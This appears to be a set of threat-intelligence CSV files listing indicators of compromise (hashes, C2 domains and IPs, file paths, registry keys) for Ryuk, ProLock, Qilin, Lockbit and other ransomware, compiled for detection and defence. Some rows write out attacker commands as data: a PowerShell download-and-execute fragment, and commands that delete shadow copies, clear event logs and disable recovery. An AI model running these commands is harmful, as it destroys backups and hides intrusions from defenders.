1 | Indicator_type,Data,Note 2 | sha256,e7ccbcc9f500272f8b6422e9900c5131768cc9ca074e6cb8cc92bce385a7ee2e,Netfilim (Nemty) ransomware 3 | sha256,3cd9b8f675d4718c4d73a9b1656836790a058b8ba46c1e0f254d46775ab06556,Cobalt Strike 4 | command_line_parameter,-nop -w hidden -c IEX ((new-object net.webclient).downloadstring,Powershell command 5 | domain,aes.one,C2 6 | file_path_name,%AppData%/Local/MEGAsync.exe,MEGA app to exfiltrate data 7 | file_path_name,%AppData%/Local/MEGAupdater.exe,MEGA app to exfiltrate data 8 | ip,45.11.180.250,Threat Actor Infrastructure 9 | filename,INFECTION-HELP.txt,Ransom Note 10 | -------------------------------------------------------------------------------- /Ransomware-Netwalker: -------------------------------------------------------------------------------- 1 | ##IOCs 2 | 3 | #Netwalker ransomware 4 | 0081ebb0d55eda81281afc952107b1540dc3b8ee 5 | 0e76db2d2a61b5983c295bb325049b64e74b40ba 6 | 147c1adc615daa93e84a5a9210ccc14ae86f6c55 7 | 16094d75f4bb593b196210e5d082a7abcdce1d8c 8 | 183bca7e9b101a5e29ce6698e365ee552b48d0d8 9 | 1897bcfc7f3d4a36bdd29da61e87ba00812dca24 10 | 19f12d29639ced3d22f8b4e8e07bf83e1a3fc0aa 11 | 1b5dc84b6fc69ffcc7d8bbf3e3ab0b9b305d6365 12 | 1e1b1c4ae648786fe429c9ddd2182e0d58bcf423 13 | 2a12c2297e08649933785629b047edc38ebe907c 14 | 2ddf48174221371ad4f5d339353a3f998044d95d 15 | 31e27c53077208aff54b883e8304b06440f736e2 16 | 3262e3d171b3b371a59ef62053032ff4d8510657 17 | 3fb77d821ea7ec2b30fd3944c3d9361093a58cd6 18 | 412112597d6c0dd099def148527a2b0466f0f658 19 | 4418547ab686293b57252ee9217d3e0e6823e3b3 20 | 4d02ab30002814f3ce0a9888a34abcf641fad3d1 21 | 4d3500625181c1469f66163bb7882ec1e82ce46a 22 | 4ff76d95673f950b4f949d9f362ee0cafa6307e2 23 | 50de46dcd782cafbdecec9860695ca3366644a3d 24 | 5b165601b8d0b13a8833c31cb36644aea8121f74 25 | 5be2fb7adcfefd741e6b98b4beeadf9e24ea7423 26 | 5c3aede31aaa0c77bfc56111ec39ac0503662dd7 27 | 61905f80bd29b2bd0cd522a7e822aeb8733bb78c 28 | 69e858f578fb0e7fdfb1d26db52dd6a95f5802ff 29 | 6a13535190bdcd62af6b4930ea28664c13c6a6be 30 | 6c06ed6155aef39529286ab8878432b74ac305b8 31 | 6da8ae1da95a0c96b432ad822076a0255e6744fd 32 | 6deb034d270782df82b9a012b1e69df6cccb21fe 33 | 794589026bdc8b01cad097ffcd50be37a87e7c29 34 | 79e6d0dbdfb89350fcf924c6554a5b7c79d4d66d 35 | 807d30f37bf2e052a253f64d102a7ab21933567b 36 | 82720e4d3fb83baff552ec25eea0fed2befe94fa 37 | 8bbfdfdfd026a106943c4e2ec317c89285aa98da 38 | 9185d661347a9637250e118d4ee91188945cd699 39 | 96432d979fdec055e4f40845a27cf4a9c0a0a34b 40 | 9df8e910986e2d6868278bd63236aa929630da40 41 | a14bab81de06e9b590f6cfcd400f90fb5b667eff 42 | a5bea314f701b06efd71533c6db8760da3509cc3 43 | ae9a1f6df72e286c5be1ab13bbd8c75878625d58 44 | b00710d529aefd25d8d51a2c0577bbb72191bc05 45 | b0589d8d73590f39b6f9eba50c375fab858ccfb5 46 | b1212f5b90c45cd22e2601edf74a68e617baa86d 47 | c26d5fbe02f8b0e6a40672b12e69ee78343e9a41 48 | c400de9be89e17b57532ec003e404941f95e358b 49 | c5b3fa421db00fe931f439af5df4f65f7f3d9a1a 50 | d051839026937273723e1b8523d852e799e72041 51 | e1dc994b0ac412e9be56f615eaf4c3dd73315253 52 | d35cbad4163a967f66be460bac029895506917ed 53 | e57731be1f15c323a7b55b914a0599722ff3985f 54 | f0952ec5d3c90398e1335f1fad00b80dbd4c5a32 55 | 56 | #Reconnaisance tools 57 | 5aa43391fa00828b0d764b555eb1908b747c8781 58 | 59 | ##Privilege elevation exploits 60 | 61 | #CVE-2020-0796 62 | 656611001c4a0dcba77392b61461395c9abe82a5 63 | 97ee255315173ff6cc62ef4ede12d4cec64af008 64 | 65 | #CVE-2019-1458 66 | c82fe9c9fdd61e1e677fe4c497be2e7908476d64 67 | 68 | #CVE-2017-0213 69 | b3423b5d096cf915019cd8d7c994cf9919523901 70 | 71 | #CVE-2015-1701 72 | 90d17ebd75ce7ff4f15b2df951572653efe2ea17 73 | 74 | ##Password grabbers 75 | 76 | #Mimikatz-related 77 | 11b0b620d0f0c4269a191d4ad9fd2042fb5e9d6c 78 | 99d6cc258737964336fb3847a7027718f70005f5 79 | bdacb11aeded5bc985a2378174fdbbb3290931be 80 | 81 | #Other 82 | 0ae1f9071c5e8fe4a69d3f671937935d242d8a6c 83 | 662bde0b00757c6cacd795b90115c802f1125692 84 | 93a2d7c3a9b83371d96a575c15fe6fce6f9d50d3 85 | 86 | #Brute forcers 87 | 6d390038003c298c7ab8f2cbe35a50b07e096554 88 | 89 | ##Other tools 90 | 91 | #Teamviewer 92 | 1004077765c94796c4ec515a5c031f32fac80f1b 93 | a89e825ab5013743fbb455a2d0b1f4eb88b5f868 94 | 95 | #AnyDesk 96 | 39194c57c0488eca2ca7600d03783f6df4957688 97 | 98 | #AV removal tools 99 | 1b394aaf9af9338d6335cbfcac88155c6db2ea0b 100 | 0c15d2bd27aa88b03e3d4af7a87f92065a2cc13a 101 | 2bee8579ef9d3146708179ffd881610366e53d15 102 | 103 | #Python installer 104 | 068bca4ae5678a9f8db721066ee029d4dd4bf3f4 105 | 106 | #Lateral movement 107 | 3e32b19e22dd82aab0259752d670e64c9a4a3ae9 108 | 502a5780ae69e87db4842d52c59713b1c79dc702 109 | 110 | #Misc scripts 111 | 3de3b2df19bf8498b94d4b2c2bd2ec21399f346a 112 | 113 | -------------------------------------------------------------------------------- /Ransomware-Play.csv: -------------------------------------------------------------------------------- 1 | Indicator,Data,Note 2 | Description,Indicators relating to Play ransomware published to Mastodon,https://infosec.exchange/@SophosXOps/109677906162017090 3 | domain,z3a2.ssndob.cn.com,Domain (Cobalt C2) 4 | domain,mbrlkbtq5jonaqkurjwmxftytyn2ethqvbxfu4rgjbkkknndqwae6byd.onion,Onion site 5 | domain,k7kg3jqxang3wh7hnmaiokchk7qoebupfgoik6rha6mjpzwupwtj25yd.onion,Onion site 6 | filename,22.dll,Cobalt Strike DLL 7 | url,hxxp://45.227.252.247/download/22.dll,file host 8 | ip,107.189.30.131,IPv4 (Cobalt C2) 9 | ip,45.227.252.247,IPv4 (Cobalt C2) 10 | ip,5.255.103.142,IPv4 (SystemBC) 11 | sha256,4346d2098d93a7f6fddd4c37333f8ec17ff548c97f365b831abbb63dd426ed4b,libvlc.dll 12 | sha256,bf0b708978a2495aeb2bb9dd74d990363a34c317f731073a925ed8e1d0c686c0,22.dll 13 | -------------------------------------------------------------------------------- /Ransomware-ProLock.csv: -------------------------------------------------------------------------------- 1 | Indicator_Type,Data,Note 2 | Description,Indicators from ProLock ransomware, 3 | file_path_name,C:\ProgramData\WinMgr.bmp,Image file containing ProLock executable code 4 | file_path_name,C:\ProgramDaa\WinMgr.xml,XML file used for creation of ProLock ransomware task in Windows Task Scheduler 5 | file_path_name,C:\ProgramData\run.bat,Batch file used to create ProLock ransomware task 6 | file_path_name,C:\ProgramData\clean.bat,Batch file containing base64-encoded Powershell script that invokes ProLock executable 7 | file_path_name,C:\Windows\System32\Tasks\WinMgr,Task created to execute ProLock 8 | file_name,[HOW TO RECOVER FILES].txt,ProLock ransom note file 9 | url_path,http://185.212.128.8/B/,Download point for clean.bat 10 | IP address,185.212.128.8,ProLock C&C host 11 | sha_1,9cae5fcefc8bc9b748b4b16549e789e27ae816df,clean.bat ProLock Powershell dropper sample 1 12 | sha_1,a037439ad7e79dbf4a20664cf10126c93429e350,run.bat ProLock launcher script 13 | sha_256,18661f8c245d26be1ec4df48a9e186569a77237f424f322f00ef94652b9d5f35,Run.bat ProLock launcher script 14 | sha_1,0ce3614560e7c1ddbc3b8f56f3e45278de47d3bb,clean.bat ProLock Powershell dropper sample 2 15 | sha_256,b262b1b82e5db337d367ea1d4119cadb928963896f1aff940be763a00d45f305,clean.bat ProLock Powershell dropper sample 2 16 | sha_1,4f125d890a8f98c9c7069b0bb2b5625c7754fad6,WinMgr.xml ProLock task scheduler configuration file 17 | sha_256,2f0e4b178311a260601e054b0b405999715084227e49ff18a19e1a59f7b2f309,WinMgr.xml ProLock task scheduler configuration file 18 | sha_1,e2a961c9a78d4c8bf118a0387dc15c564efc8fe9,WinMgr.bmp file carrying ProLock executable (sample 1 and 2 identical) 19 | sha_256,a6ded68af5a6e5cc8c1adee029347ec72da3b10a439d98f79f4b15801abd7af0,WinMgr.bmp file carrying ProLock executable (sample 1 and 2 identical) 20 | sha_256,dfbd62a3d1b239601e17a5533e5cef53036647901f3fb72be76d92063e279178,ProLock executable sample 3 (memory extracted) 21 | sha_1,81d5888bb8d43d88315c040be1f51db6bb5cf64c,ProLock executable sample 3 (memory extracted) 22 | registry_path_key,HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet,Prolock sets to 0 (off) 23 | registry_path_key,HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect,Prolock sets to 1 (on) 24 | registry_path_key,HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1738D1D9-01DA-41FC-B106-6F4DF75D08C9}\Path,"sets values Type: REG_SZ, Length: 16, Data: \WinMgr" 25 | registry_path_key,HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1738D1D9-01DA-41FC-B106-6F4DF75D08C9}\Hash,"sets values Type: REG_BINARY, Length: 32, Data: 56 4F 39 36 66 75 E5 89 94 FF 87 0F 38 FC 15 FB" 26 | registry_path_key,HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\WinMgr\Id,"sets values Type: REG_SZ, Length: 78, Data: {1738D1D9-01DA-41FC-B106-6F4DF75D08C9}" 27 | registry_path_key,HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\WinMgr\Index,"Sets values Type: REG_DWORD, Length: 4, Data: 1" 28 | -------------------------------------------------------------------------------- /Ransomware-Qilin-STAC4365.csv: -------------------------------------------------------------------------------- 1 | Indicator,Data,Notes 2 | file_path_name,C:\Users\\Documents\.exe,Qilin ransomware binary executed with a unique 32-character password for each victim 3 | sha256,fdf6b0560385a6445bd399eba03c8662be9e61928d6cbc268d550163a5a09285,Qilin ransomware binary executed with a unique 32-character password for each victim 4 | sha256,0b9b0715a1ffb427a02e61ae8fd11c00b5d086eb76102d4b12634e57285c1aba,Qilin ransomware binary executed with a unique 32-character password for each victim 5 | sha256,9da70c521b929725774c3980763a4aed9baf9de4e6f83fc8f668c3a365a55f82,Qilin ransomware binary executed with a unique 32-character password for each victim 6 | sha256,b52917b0658cd2a9197e6bb62bade243ee1ad164f2bb566f3a1e09dfa580397f,Qilin ransomware binary executed with a unique 32-character password for each victim 7 | sha256,ef3e42e5fa24acaee2428ff0118feb2be925bfe6b1ea4eccce8b70a7ac5ab2cc,Qilin ransomware binary executed with a unique 32-character password for each victim 8 | url,hxxps[:]//b8dymnk3.r.us-east-1.awstrack[.]me/L0/https[:]%2F%2Fcloud.screenconnect[.]com.ms%2FsuKcHZYV/1/010001948f5ca748-c4d2fc4f-aa9e-40d4-afe9-bbe0036bc608-000000/mWU0NBS5qVoIVdXUd4HdKWrsBSI=410,Malicious phishing link redirect with Amazon SES tracking 9 | url,hxxps[:]//cloud.screenconnect[.]com.ms/suKcHZYV/1/010001948f5ca748-c4d2fc4f-aa9e-40d4-afe9-bbe0036bc608-000000/mWU0NBS5qVoIVdXUd4HdKWrsBSI=410,Malicious URI redirect 10 | file_path_name,C:\Windows\SystemTemp\ScreenConnect\24.3.7.9067\ru.msi,Malicious ScreenConnect Client installer file 11 | domain,cloud.screenconnect.com.ms,Malicious URI redirect 12 | ip,186.2.163.10,Malicious web hosting IP 13 | ip,92.119.159.30,Russian IP used to connect to malicious ScreenConnect instance 14 | ip,109.107.173.60,Command and Control host 15 | file_path_name,C:\README-RECOVER-  .txt,Ransom note 16 | ip,128.127.180.156,Tor exit.node used to connect to ScreenConnect instance 17 | ip,109.70.100.1,Tor exit.node used to connect to ScreenConnect instance 18 | sha256,45c8716c69f56e26c98369e626e0b47d7ea5e15d3fb3d97f0d5b6e8997299d1a,Binary used to exploit CVE-2023-27532 in Veeam software. Attacker executed this binary targeting various hosts as an argument over port 9401 19 | file_path_name,C:\programdata\veeam.exe,Binary used to exploit CVE-2023-27532 in Veeam software. Attacker executed this binary targeting various hosts as an argument over port 9401 -------------------------------------------------------------------------------- /Ransomware-REvil-Kaseya.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | file_path_name,C:\windows\cert.exe,Copied CERTUTIL 3 | file_path_name,C:\windows\msmpeng.exe,Outdated Defender executable vulnerable to DLL sideload 4 | sha256,33bc14d231a4afaa18f06513766d5f69d8b88f1e697cd127d24fb4b72ad44c7a,Outdated Defender executable vulnerable to DLL sideload 5 | file_path_name,C:\kworking\agent.crt,Revil dropper used in Kaseya exploit 6 | sha256,d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1,Revil dropper used in Kaseya exploit 7 | file_path_name,C:\windows\mpsvc.dll,Revil ransomware DLL 8 | sha256,8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd,Revil ransomware DLL 9 | domain,ncuccr.org, 10 | domain,1team.es, 11 | domain,4net.guru, 12 | domain,35-40konkatsu.net, 13 | domain,123vrachi.ru, 14 | domain,4youbeautysalon.com, 15 | domain,12starhd.online, 16 | domain,101gowrie.com, 17 | domain,8449nohate.org, 18 | domain,1kbk.com.ua, 19 | domain,365questions.org, 20 | domain,321play.com.hk, 21 | domain,candyhouseusa.com, 22 | domain,andersongilmour.co.uk, 23 | domain,facettenreich27.de, 24 | domain,blgr.be, 25 | domain,fannmedias.com, 26 | domain,southeasternacademyofprosthodontics.org, 27 | domain,filmstreamingvfcomplet.be, 28 | domain,smartypractice.com, 29 | domain,tanzschule-kieber.de, 30 | domain,iqbalscientific.com, 31 | domain,pasvenska.se, 32 | domain,cursosgratuitosnainternet.com, 33 | domain,bierensgebakkramen.nl, 34 | domain,c2e-poitiers.com, 35 | domain,gonzalezfornes.es, 36 | domain,tonelektro.nl, 37 | domain,milestoneshows.com, 38 | domain,blossombeyond50.com, 39 | domain,thomasvicino.com, 40 | domain,kaotikkustomz.com, 41 | domain,mindpackstudios.com, 42 | domain,faroairporttransfers.net, 43 | domain,daklesa.de, 44 | domain,bxdf.info, 45 | domain,simoneblum.de, 46 | domain,gmto.fr, 47 | domain,cerebralforce.net, 48 | domain,myhostcloud.com, 49 | domain,fotoscondron.com, 50 | domain,sw1m.ru, 51 | domain,homng.net, -------------------------------------------------------------------------------- /Ransomware-Ryuk.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,IoCs of a Ryuk ransomware attack,https://news.sophos.com/en-us/2020/10/14/inside-a-new-ryuk-ransomware-attack/ 3 | domain,chainnss.com,C2 used for reverse shell 4 | domain,fastbloodhunter.com,C2 used for reverse shell 5 | domain,mn.fastbloodhunter.com,C2 Cobalt Strike 6 | domain,mn.fastbloodhunter.com/templates,C2 Cobalt Strike 7 | file_path,C:\PerfLogs\*.exe,any executable files in the Performance Logs folder 8 | file_path,C:\ProgramData\c331b9e8724cb2dd8a2f\,Troj/Cobalt-J - multiple Cobalt Strike components found here 9 | file_path,c:\programdata\sqav\,File path used by Trickbot 10 | file_path,C:\share$\,File path used by Troj/Ryuk-AP 11 | file_path_name,c:\perflogs\Arti64.dll,Troj/Agent-BFQ 12 | file_path_name,C:\PerfLogs\cc1.exe,Troj/Ryuk-AR 13 | file_path_name,C:\PerfLogs\fx11_only_current_pc_for_crypt_x86.exe,Troj/Ryuk-AQ 14 | file_path_name,c:\perflogs\m8.exe,Troj/Ryuk-AP 15 | file_path_name,C:\PerfLogs\mm1.exe,Troj/Ryuk-AR 16 | file_path_name,C:\PerfLogs\RyukReadMe.html,Ryuk ransom note 17 | file_path_name,C:\PerfLogs\xXx.exe,Troj/Ryuk-AP 18 | file_path_name,C:\PerfLogs\zZz.exe, 19 | file_path_name,c:\programdata\sqav\itvs.exe,Troj/Trickbo-ZA 20 | file_path_name,C:\share$\xxx.exe,Troj/Ryuk-AP 21 | file_path_name,C:\temp\nr6r.exe,Consider any executable files in the temp folder suspicious 22 | file_path_name,c:\users\[username]\appdata\local\microsoft\windows\inetcache\ie\tp7uyqhh\print_document.exe,Troj/Agent-BFQS (Emotet) - Consider any executable files running from within the browser cache folder suspicious 23 | file_path_name,C:\Users\ntadmin\Pictures\svhost32.exe,Troj/Cobalt-J - Consider any executable files in the Pictures folder suspicious 24 | file_path_name,C:\Windows\Temp\adf\adf.bat, 25 | file_path_name,C:\Windows\Temp\MRT\socks.exe,Troj/Trickbo-ZA - Consider any executable files in the temp folder suspicious 26 | file_path_name,c:\windows\temp\mrt\socks32.dll,Consider any DLL files loaded from the temp folder suspicious 27 | file_path_name,C:\Windows\Temp\Puhebes.exe,Mal/Inject-GQ - Consider any executable files in the temp folder suspicious 28 | filename,3iue88e0.exe,GMER - known file hash 29 | filename,P64.exe,Troj/Cobalt-J 30 | ip,104.248.83.13,C2 Cobalt Strike 31 | sha256,0856b3c06805d3935b1db325c4e9c9131572b4cf09f07d989911495807775cab,Troj/Cobalt-J 32 | sha256,0d6a7a2c2d9ae89bf54f199fb63c67424d6e242777060971ee53b62dedad4096,dropper 33 | sha256,21cb81424dc1921344bd1cd9ad7c870fbcaadbe2e9f499d7863e9a06d7de6ee0,Troj/Ryuk-AR 34 | sha256,32e51accf5a30da12e43b3c7f83867577fcd6fb363d7773a743ab1bbb9653d06,Troj/Trickbo-ZA 35 | sha256,3f58610586c87bb8b9f2e93768c5f289fe39ca8570902165df5d340bedc62247,Mal/Inject-GQ 36 | sha256,3f58610586c87bb8b9f2e93768c5f289fe39ca8570902165df5d340bedc62247,Mal/Inject-GQ 37 | sha256,4685e91b859b372b955c11d8d68fd562fad478520a2f4a05c46d1fe6fb991b61,Troj/Cobalt-J 38 | sha256,6c7f43434e5db8703c0a47dedeeab976159d8704bfbe2e4ff65405f38d508e9d,Troj/Agent-BFQS (Emotet) 39 | sha256,92f124ea5217f3fe5cbab1c37a961df0437d5a9cbde1af268c60c4b3194b80ed,Troj/Ryuk-AR 40 | sha256,9a11e1b2a6821857e1990a004447e35692d04e5b7d237697fbcc90b5198e3719,Troj/Cobalt-J 41 | sha256,ba2a96dae66324df5bbb0751a04c538722ad49daa12d51625f8a1890608b1168,Troj/Cobalt-J 42 | sha256,c1f753047a0a5679aea0f675846364ea2f1fc4f9370f6caa89d0bfb1feb561f1,dropper 43 | sha256,c8076d0aa251a8c767e5f4c32c29588d46ffbed1709acaf9ca38b9d02ef7e276,Troj/Agent-BFQ 44 | sha256,c9b06152ac1c851eaed84ee052c374341ed89d9a6e5a5d97bd0e4b941c01a274,Troj/Cobalt-J 45 | sha256,d0d7a8f588693b7cc967fb4069419125625eb7454ba553c0416f35fc95307cbe,Troj/Ryuk-AP 46 | sha256,D7333223DCC1002AAE04E25E31D8C297EFA791A2C1E609D67AC6D9AF338EFBE8,Troj/Ryuk-AQ 47 | sha256,e8a3e804a96c716a3e9b69195db6ffb0d33e2433af871e4d4e1eab3097237173,GMER - misused potentially beneficial app 48 | sha256,edd0675e0fcce16ae7cbb1f10fbb8407ca5e0a188eab9682f43744c95e09f1c9, 49 | sha256,ff5e6fbf14c5eb35c1b4f24e4b08b30ba2e512a4b25ab7b652f0567edb94097e,Troj/Cobalt-J 50 | -------------------------------------------------------------------------------- /Ransomware_BlackCat - triple ransomware attack.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,"IOCs related to triple ransomware attacks by Lockbit, Hive, and ALPHV/BlackCat",https://news.sophos.com/en-us/lockbit-hive-and-blackcat-attack-automotive-supplier-in-triple-ransomware-attack 3 | filename,FXXX.exe,ALPHV/BlackCat ransomware executable 4 | file_path,C:\users\[user]\desktop\fXXX.exe ,Filepath of ALPHV/BlackCat ransomware executable 5 | filename,FXXXX.exe,ALPHV/BlackCat ransomware executable 6 | file_path,C:\fXXXX.exe,Filepath of ALPHV/BlackCat ransomware executable 7 | sha256,a50ddd96edf7f66a29b407657e8548e2b026bf1ac3d4e08e396f4043d4513f9e ,Hash of ALPHV/BlackCat ransomware executable 8 | sha256,9078564b65b9ac3ce4f59c929207f17037ef971429f0d3ef3751d46651fec8c6 ,Hash of ALPHV/BlackCat ransomware executable 9 | filename,RECOVER-eprzzxl-FILES.txt,ALPHV/BlackCat ransom note 10 | filename,sh.txt,Contains results of threat actor remote share enumeration 11 | command_line,bcdedit /set {default} recoveryenabled No ,Disable recovery 12 | command_line,"cmd.exe /c for /F \""tokens=*\"" %1 in ('wevtutil.exe el') DO wevtutil.exe cl \""%1\"" ",Clear Windows Event Logs 13 | command_line,vssadmin.exe Delete Shadows /all /quiet ,Delete volume shadow copies 14 | command_line,wmic.exe Shadowcopy Delete ,Delete volume shadow copies 15 | -------------------------------------------------------------------------------- /Ransomware_BlackKingDom.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,Files from the Black KingDom ransomware report,https://news.sophos.com/en-us/2021/03/23/black-kingdom/ ? 3 | file_path_name,c:\Windows\System32\(16 random alphabet characters).exe,webshell drops ransomware to the %SYSTEM% 4 | url,hxxp://yuuuuu44[.]com/vpn-service/$(f1)/crunchyroll-vpn,Where $(f1) is a randomly-generated 16-alphabetic character string 5 | domain,yuuuuu44.com,Domain used to host malware payloads 6 | ip,104.21.89.10,IP address used to host the yuuuuu44 domain 7 | ip,172.64.80.0/20,IP address range used to host the yuuuuu44 domain 8 | ip,185.220.101.204,Tor exit node - malware delivery 9 | ip,185.220.101.216,Tor exit node - malware orchestration 10 | sha256,b9dbdf11da3630f464b8daace88e11c374a642e5082850e9f10a1b09d69ff04f,Ransomware executable 11 | sha256,c4aa94c73a50b2deca0401f97e4202337e522be3df629b3ef91e706488b64908,Ransomware executable 12 | sha256,a387c3c5776ee1b61018eeb3408fa7fa7490915146078d65b95621315e8b4287,Ransomware executable 13 | sha256,815d7f9d732c4d1a70cec05433b8d4de75cba1ca9caabbbe4b8cde3f176cc670,Ransomware executable 14 | sha256,910fbfa8ef4ad7183c1b5bdd3c9fd1380e617ca0042b428873c48f71ddc857db,Ransomware executable 15 | sha256,866b1f5c5edd9f01c5ba84d02e94ae7c1f9b2196af380eed1917e8fc21acbbdc,Ransomware executable 16 | sha256,c25a5c14269c990c94a4a20443c4eb266318200e4d7927c163e0eaec4ede780a,Ransomware executable 17 | sha256,62615438CF8F7DE6600D16A493C28BBBD3B052CCC4F9414DFE1CF031681E226F,ChackPassPL.aspx webshell - not publicly released 18 | sha256,800E036CF9DA316193BECABC6ACE688634709CD898AE81893E80B635DCAA06D0,ChackIdIO.aspx webshell - not publicly released 19 | -------------------------------------------------------------------------------- /Ransomware_DearCry.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | sha256,2B9838DA7EDB0DECD32B086E47A31E8F5733B5981AD8247A2F9508E232589BFF,DearCry 3 | sha256,FEB3E6D30BA573BA23F3BD1291CA173B7879706D1FE039C34D53A4FDCDF33EDE,DearCry 4 | sha256,E044D9F2D0F1260C3F4A543A1E67F33FCAC265BE114A1B135FD575B860D2B8C6,DearCry 5 | sha256,10BCE0FF6597F347C3CCA8363B7C81A8BFF52D2FF81245CD1E66A6E11AEB25DA,DearCry 6 | sha256,FDEC933CA1DD1387D970EEEA32CE5D1F87940DFB6A403AB5FC149813726CBD65,DearCry 7 | -------------------------------------------------------------------------------- /Ransomware_Hive - triple ransomware attack.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,"IOCs related to triple ransomware attacks by Lockbit, Hive, and ALPHV/BlackCat",https://news.sophos.com/en-us/lockbit-hive-and-blackcat-attack-automotive-supplier-in-triple-ransomware-attack 3 | filename,windows_x32_encrypt.exe,Hive ransomware executable 4 | file_path,C:\Windows\AdminArsenal\PDQDeployRunner\service-1\exec\windows_x32_encrypt.exe,Filepath of Hive ransomware executable 5 | filename,HOW_TO_DECRYPT.txt,Hive ransom note 6 | sha256,4b8e83f4f6257fc1b9fa485030c4f195313bf3b1f41d279bbc728abc6bb9309a ,Hash of Hive ransomware executable 7 | command_line,windows_x32_encrypt.exe -u [] -da [DOMAIN]\[user]:[password], 8 | -------------------------------------------------------------------------------- /Ransomware_Lockbit - triple ransomware attack.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,"IOCs related to triple ransomware attacks by Lockbit, Hive, and ALPHV/BlackCat",https://news.sophos.com/en-us/lockbit-hive-and-blackcat-attack-automotive-supplier-in-triple-ransomware-attack 3 | sha256,24a087ac1d44356a49e67dbfdc8bd1a393a524282f2b4df2daa76e3a38638f2f ,Hash of Lockbit ransomware executable locker.exe 4 | sha256,a385b92ce5ffa4171c94997f158ec5c02181da77ec0bc5f9457c98fb9d38158b,Hash of Lockbit ransomware executable LockBit_AF51C0A7004B80EA.exe  5 | filename,LockBit_AF51C0A7004B80EA.exe ,Lockbit ransomware executable 6 | filename,locker.exe,Lockbit ransomware executable 7 | file_path,C:\Users\[user]\Desktop\LockBit_AF51C0A7004B80EA.exe,Filepath of Lockbit ransomware executable 8 | file_path,C:\new folder\locker.exe ,Filepath of Lockbit ransomware executable 9 | filename,Restore-My-Files.txt,Lockbit ransom note 10 | filename,invoke-mimikatz.ps1,Mimikatz PowerShell script 11 | file_path,C:\users\[user]\desktop\invoke-mimikatz.ps1 ,Filepath of Mimikatz PowerShell script 12 | filename,1.bat,Batch script to deploy ransomware 13 | filename,2.bat,Batch script to deploy ransomware 14 | -------------------------------------------------------------------------------- /Ransomware_prolock_processes_stopped.csv: -------------------------------------------------------------------------------- 1 | Process name,Application 2 | agentsvc.exe,A component of Panda Security's antivirus 3 | dbgeng50.exe,A component of IBM's Rational Rose software modeling tool 4 | dbsnmp.exe,Oracle intelligent agent executable) 5 | excel,Microsoft Excel 6 | firefox,Mozilla Firefox browser 7 | infopath,Microsoft InfoPath 8 | isql ,Interactive SQL parser utility distributed with Sybase 9 | mbamtray,A component of Malwarebytes antivirus 10 | msaccess,Microsoft Access database 11 | mspub,Microsoft Publisher 12 | mydesktop,Virtual desktop interface 13 | mysql,mySQL database 14 | ntrtscan ,Trend Micro antivirus 15 | ocssd ,Oracle Cluster Synchronization Services daemon 16 | onenote,Microsoft OneNote 17 | oracle,Oracle database 18 | outlook,Microsoft Outlook 19 | pccntmon,Trend Micro antivirus 20 | powerpoint,Microsoft PowerPoint 21 | sqbcoreservice ,Redgate SQL Backup agent 22 | thunderbird,Mozilla Thunderbird mail client 23 | visio,Microsoft Visio 24 | winword,Microsoft Word -------------------------------------------------------------------------------- /STAC1807_June_update.csv: -------------------------------------------------------------------------------- 1 | Indicator,Data ,Notes 2 | ip,188.166.243.83, 3 | ip,68.183.224.50, 4 | ip,128.199.144.251, 5 | file_path_name,C:\programdata\adobe\mscorsvw.exe, 6 | file_path_name,C:\Windows\system32\mscorsvw.exe, 7 | file_path_name,C:\Windows\Setup\mscorsvw.exe, 8 | file_path_name,C:\hclabap\barcode\mscorsvw.exe, 9 | file_path_name,C:\HCLABSmart\barcode\mscorsvw.exe, 10 | file_path_name,C:\Windows\System32\migration\WUDFUsbccidDriver.exe, 11 | file_path_name,C:\programdata\microsoft\EdgeUpdate\ASDTool.exe, 12 | file_path_name,C:\programdata\adobe\mscorsvc.dll, 13 | file_path_name,C:\Windows\system32\mscorsvc.dll, 14 | file_path_name,C:\Windows\Setup\mscorsvc.dll, 15 | file_path_name,C:\hclabap\barcode\mscorsvc.dll, 16 | file_path_name,C:\HCLABSmart\barcode\msi.dll, 17 | file_path_name,C:\Windows\System32\migration\msi.dll, 18 | file_path_name,C:\programdata\microsoft\EdgeUpdate\msi.dll,https://www.virustotal.com/gui/file/8781f2d85eec49205b29aa4bc09b1d7d1dd9e1a650634393e3adbc5354738a51 19 | file_path_name,C:\programdata\microsoft\EdgeUpdate\msiconf.dll,https://www.virustotal.com/gui/file/11c7728697d5ea11c592fee213063c6369340051157f71ddc7ca891f5f367720/relations -------------------------------------------------------------------------------- /STAC6451_IOCs.csv: -------------------------------------------------------------------------------- 1 | Indicator,Data ,Note 2 | sha256,558147caa20eddf708986e89d7f000809025c5ade03fda1f352dba513e8f1454,An executable suspected to be a colbalt strike beacon dropped by the TA 3 | file_path_name,C:\ProgramData\Plug\tosbtkbd.exe,An executable suspected to be a colbalt strike beacon dropped by the TA 4 | sha256,804de08fb28dcae51efca2960de3dc9460114fc8d376ad6a966144cb55aa9f75,Cobalt Strike Loader 5 | file_path_name,C:\users\public\downloads\USERENV.dll,Cobalt Strike Loader 6 | sha256,d13b43518d0ed2fe938e186eb218debd15022b9803c0d330363ca40830db9a77,Hex encoded DLL in cobalt strike loader (userenv.dll) 7 | sha256,ae7031dfae21616d7eec326c16ebac7f9d911a354ba32dd4b4c458fe50351805,Malicious DLL - CLR_module.dll 8 | file_name,CLR_module.dll,Malicious DLL - CLR_module.dll 9 | sha256,04ba9dd2d3127511af52e1be3015e0424491cfb2133f90f8b5b5cac2e33166d4,Malicious file 